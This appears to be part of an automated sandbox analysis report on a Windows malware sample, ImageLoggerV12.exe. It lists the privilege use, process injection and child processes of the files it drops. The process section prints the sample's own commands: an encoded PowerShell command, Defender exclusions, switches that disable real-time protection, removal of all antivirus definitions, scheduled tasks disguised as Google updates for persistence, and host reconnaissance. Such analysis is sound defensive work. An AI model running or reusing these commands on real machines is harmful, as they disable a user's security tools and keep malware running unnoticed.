N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\GC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3696 wrote to memory of 368 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3696 wrote to memory of 368 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3696 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Roaming\Logger.exe
PID 3696 wrote to memory of 1764 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Roaming\Logger.exe
PID 1764 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Users\Admin\AppData\Roaming\Logger.exe
PID 1764 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Users\Admin\AppData\Roaming\Logger.exe
PID 3696 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
PID 3696 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
PID 3696 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\UI.exe
PID 3696 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\UI.exe
PID 3696 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\UI.exe
PID 1664 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Windows\system32\cmd.exe
PID 3696 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\GC.exe
PID 3696 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\GC.exe
PID 1664 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Windows\system32\cmd.exe
PID 1904 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1904 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1156 wrote to memory of 4884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1156 wrote to memory of 4884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1568 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\GC.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1568 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\GC.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1324 wrote to memory of 4640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1324 wrote to memory of 4640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2916 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2916 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1568 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\GC.exe C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
PID 1568 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\GC.exe C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
PID 4384 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4384 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2264 wrote to memory of 1792 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2264 wrote to memory of 1792 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2264 wrote to memory of 2080 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2264 wrote to memory of 2080 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2264 wrote to memory of 3268 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2264 wrote to memory of 3268 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2264 wrote to memory of 4840 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2264 wrote to memory of 4840 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3720 wrote to memory of 2992 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3720 wrote to memory of 2992 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3720 wrote to memory of 3220 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3720 wrote to memory of 3220 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3720 wrote to memory of 3092 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3720 wrote to memory of 3092 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3720 wrote to memory of 1436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3720 wrote to memory of 1436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4996 wrote to memory of 4576 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 4996 wrote to memory of 1092 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe

"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAawBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegBsACMAPgA="

C:\Users\Admin\AppData\Roaming\Logger.exe

"C:\Users\Admin\AppData\Roaming\Logger.exe"

C:\Users\Admin\AppData\Roaming\Logger.exe

"C:\Users\Admin\AppData\Roaming\Logger.exe"

C:\Users\Admin\AppData\Local\Temp\mainPannel.exe

"C:\Users\Admin\AppData\Local\Temp\mainPannel.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Logger.exe'

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Users\Admin\AppData\Local\Temp\GC.exe

"C:\Users\Admin\AppData\Local\Temp\GC.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Logger.exe'"

C:\Users\Admin\AppData\Local\Temp\UI.exe

"C:\Users\Admin\AppData\Local\Temp\UI.exe"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe

"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

